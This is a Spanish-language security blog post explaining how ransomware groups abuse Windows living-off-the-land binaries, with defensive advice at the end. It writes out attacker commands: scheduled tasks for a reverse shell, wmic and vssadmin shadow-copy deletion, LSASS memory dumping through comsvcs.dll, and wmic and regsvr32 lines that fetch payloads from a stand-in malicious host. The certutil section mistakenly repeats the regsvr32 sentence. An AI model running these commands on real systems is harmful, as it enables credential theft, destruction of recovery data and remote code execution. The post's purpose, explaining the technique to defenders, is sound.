Cada día decenas de ataques de Ransomware logran evadir las protecciones de seguridad, robar información y cifrar datos confidenciales, que no solo dañan la reputación de una organización, sino que logran detener parcial o completamente sus operaciones comerciales. Los cibercriminales buscan a toda costa acorralar a sus víctimas para que cedan al pago de la extorsión por la recuperación de la clave de descifrado que pondría nuevamente en curso sus operaciones.
Ante esta situación las organizaciones han puesto mayor empeño en mejorar sus estrategias de ciberseguridad para preparase ante estos y otros centenares de amenazas que acechan su infraestructura cada segundo. Estas medidas han frustrado y reducido cientos de ataques ejecutados por los cibercriminales.
¿Qué están haciendo los atacantes? y ¿Cómo logran operar dentro de la infraestructura luego del compromiso inicial?
La técnica que veremos en esta publicación muestra como los atacantes abusan de herramientas legítimas ya existentes en los sistemas operativos (Windows, MAC o Linux) y que son conocidas como “living-off-the-land binaries and scripts (LOLBAS)”.
Estas herramientas son útiles para realizar actividades administrativas dentro de la máquina local o remota, pero están siendo abusadas por cibercriminales para fines maliciosos en actividades de post-explotación, tales como: reconocimiento del host, reconocimiento de la red, descarga de otras piezas malware adicionales, ejecución remota de acciones maliciosas, movimiento lateral e incluso borrar todas las evidencias que permitirían rastrear el ataque.
Si bien esta técnica no es novedosa, son más los atacantes que están haciendo uso de estas herramientas para volverse más sigilosos y camuflar todas sus actividades maliciosas dentro de una red comprometida. Un ejemplo de este tipo de ataques fue el de la banda de ransomware 8Base en octubre 2023, a un centro de atención médica con sede en EE.UU donde los atacantes utilizaron herramientas nativas de Windows antes de desplegar el binario del ransomware.
Es importante señalar que ni aun el sector salud, ahora es inmune a los ataques de ransomware, a como lo era hace algunos años, sino que se ha convertido en un objetivo atractivo para los cibercriminales, observándose un incremento en el número de víctimas anuales en este sector. Uno de los casos más recientes es el del gigante Change Healthcare en EE.UU que terminó pagando la extorsión de 2 millones de dólares a BlackCat/ALPHV ransomware por la recuperación de sus sistemas cifrados y 4 terabytes de datos.
5 binarios de Windows (LOLBins) abusados por cibercriminales
Hasta la redacción de esta nota, son 199 binarios que se rastrean en lolbas-project, un repositorio de GitHub con los detalles técnicos de cómo pueden ser utilizados en correspondencia con la matriz de Mitre Att&CK. A continuación, veamos algunos ejemplos de estos binarios y como pueden ser abusados en ataques de ransomware e incluso campañas de Ciberespionaje operadas por grupos APTs (Advanced Persistent Threat).
1. Schtasks.exe
MITRE ATT&CK Paths:
• T1053.005
• C:\windows\system32\schtasks.exe
• C:\windows\syswow64\schtasks.exe
Schtasks, permite programar tareas para la ejecución inicial o periódica del malware.
Algunos atacantes utilizan esta herramienta para:
- Ejecutar programas en un fecha y hora determinada
- Evadir la detección por comportamiento anómalo del malware al iniciarlo tiempo después de la infección inicial o ejecutarlo de forma periódica para la persistencia.
- Crear tareas programadas «ocultas»
- Enmascarar potencialmente la ejecución única en procesos del sistema firmados o de confianza, similar a la ejecución de proxy binario del sistema.
- Realizar la ejecución remota como parte del movimiento lateral.
- Ejecutar un proceso en el contexto de una cuenta especificada (como SYSTEM).
Algunos comandos observados:
Los atacantes pueden utilizar Schtasks.exe para programar tareas e incluso hacerlo de forma silenciosa para que el malware se ejecute en un tiempo determinado |
schtasks /create /sc minute /mo 1 /tn «Reverse shell» /tr c:\some\directory\revshell.exe schtasks /create /s targetmachine /tn «MyTask» /tr:\some\directory\notevil.exe /sc daily |
2. WMI.exe
MITRE ATT&CK Paths:
• T1047
• C:\Windows\System32\wbem\wmic.exe
• C:\Windows\SysWOW64\wbem\wmic.exe
WMI, es una infraestructura de administración de Windows que consta de componentes de cliente y servidor. Los clientes pueden interactuar con WMI utilizando herramientas como wmic.exe o wmiprvse.exe, así como el cmdlet de PowerShell ‘Get-WmiObject’. Estas herramientas permiten a los usuarios ejecutar tareas tanto local como remotamente para configurar sistemas, ejecutar procesos o scripts, y automatizar diversas tareas de administración del sistema.
Algunos atacantes utilizan esta herramienta para:
• Moverse lateralmente.
• Recopilar información del sistema.
• Enumerar y eliminar Volume Shadows utilizada para la recuperación de archivos post-incidentes.
• Modificar sistemas.
• Lograr la persistencia.
Algunos comandos observados:
Los atacantes pueden utilizar wmic.exe para recopilar información del sistema e incluso descargar código desde una ubicación remota.
wmic.exe /node: process call create
wmic shadowcopy delete /noninteractive
wmic process call create vssadmin.exe delete shadows /all /quiet
wmic os get /FORMAT:»http://malwaresite.com/malware.xsl»
3. Rundll32.exe
MITRE ATT&CK Paths:
• T1218.011
• C:\Windows\System32\rundll32.exe
• C:\Windows\SysWOW64\rundll32.exe
Rundll32, permite la ejecución de bibliotecas de enlaces dinámicos (DLL).
Algunos atacantes utilizan la herramienta para:
- Ejecutar DLL legítimas o funciones específicas de la DLL.
- Ejecutar código de JavaScript para ocultar un script de PowerShell que descargue y ejecute el malware desde un sitio web remoto.
- Volcar la memoria de ciertos procesos. Por ejemplo, el proceso LSASS (Local Security Authority Subsystem Service). LSASS es un proceso del sistema en Windows que administra la autenticación de usuarios.
- Aprovechar las funciones de exportación de una DLL que son capaces de conectar a los recursos de la red o evadir proxies y controles de seguridad.
Algunos comandos observados:
Los atacantes pueden utilizar Rundll32.exe para cargar bibliotecas dinámicas maliciosas que contienen el código e incluso cargar desde una función en específico y hasta ejecutar remotamente la dll |
rundll32 example.dll,SpecificEntryPoint rundll32.exe \\192.168.2.1\Files\example.dll,EntryPoint rundll32.exe C:\Windows\System32\example.dll,DllRegisterServer rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS PID> <DUMP PATH> full |
4. Regsvr32.exe
MITRE ATT&CK Paths:
• T1218.010
• C:\Windows\System32\regsvr32.exe
• C:\Windows\SysWOW64\regsvr32.exe
Regsvr32, permite registrar y anular el registro de ciertos tipos de componentes de software, como bibliotecas de vínculos dinámicos (DLL) y controles de vinculación e incrustación de objetos (OLE), que es esencial para la correcta instalación y desinstalación de software en entornos Windows. Regsvr32 invoca una función dentro de esa DLL llamada DllRegisterServer o DllUnregisterServer, dependiendo de si se está registrando o anulando el registro, respectivamente.
Algunos atacantes utilizan la herramienta para:
• Registrar y anular el registro de controles OLE (Object Linking and Embedding)
• Omitir específicamente el control de aplicaciones utilizando la funcionalidad de carga de scriptlets COM para ejecutar archivos DLL con los permisos del usuario.
• Correr archivos DLL de forma silenciosa.
Algunos comandos observados:
Los atacantes pueden utilizar regsvr32 para descargar remotamente y ejecutar localmente una DLL maliciosa que contenga código malicioso.
regsvr32 /s /n /u /i:http://malwaresite.com/malicious.dll scrobj.dll
5. Certutitl.exe
MITRE ATT&CK Paths:
• T1105
• T1140
• C:\Windows\System32\certutil.exe
• C:\Windows\SysWOW64\certutil.exe
Certutil, permite realizar diversas operaciones relacionadas con certificados digitales, autoridades de certificación (CAs) y almacenes de certificados.
Algunos atacantes utilizan la herramienta para:
• Decodificar un archivo ejecutable portátil de la herramienta de acceso remoto que se ha ocultado dentro de un archivo de certificado.
• Codificar en Base64 datos colectados
• Reensamblar fragmentos binarios en una carga maliciosa.
Algunos comandos observados:
Los atacantes pueden utilizar regsvr32 para descargar remotamente y ejecutar localmente una DLL maliciosa que contenga código malicioso.
Conclusión.
Es interesante como algunos de estos binarios legítimos y firmados por Microsoft pueden ser abusados para actividades de Evasión de Defensa, Persistencia, Escalamiento de Privilegios o Movimiento Lateral. En el caso de Evasión de Defensa, se observó como los adversarios pueden evadir medidas de seguridad al utilizar archivos confiables y firmados digitalmente para ejecutar contenido malicioso en lugar de hacerlo directamente. Esto se logra aprovechando la confianza que el sistema tiene en los archivos firmados, lo que les permite ejecutar otros archivos o comandos de manera indirecta.
Por esto es importante que las organizaciones tomen las siguientes acciones:
- Implementar soluciones de monitoreo avanzadas que puedan detectar comportamientos sospechosos, como la ejecución de binarios firmados de manera inusual o la creación de procesos enmascarados.
- Mantener políticas de control de aplicaciones y privilegios mínimo para restringir la ejecución de programas y scripts no autorizados en el sistema. Esto puede incluir el uso de listas blancas de aplicaciones aprobadas y la limitación de los privilegios de ejecución.
- Mantener el sistema operativo y aplicaciones actualizadas con los últimos parches de seguridad.
- Las soluciones de Antivirus y EDR con las últimas firmas de detección descargadas.
¿Requiere apoyo o asesoramiento profesional para la implementación de estas acciones?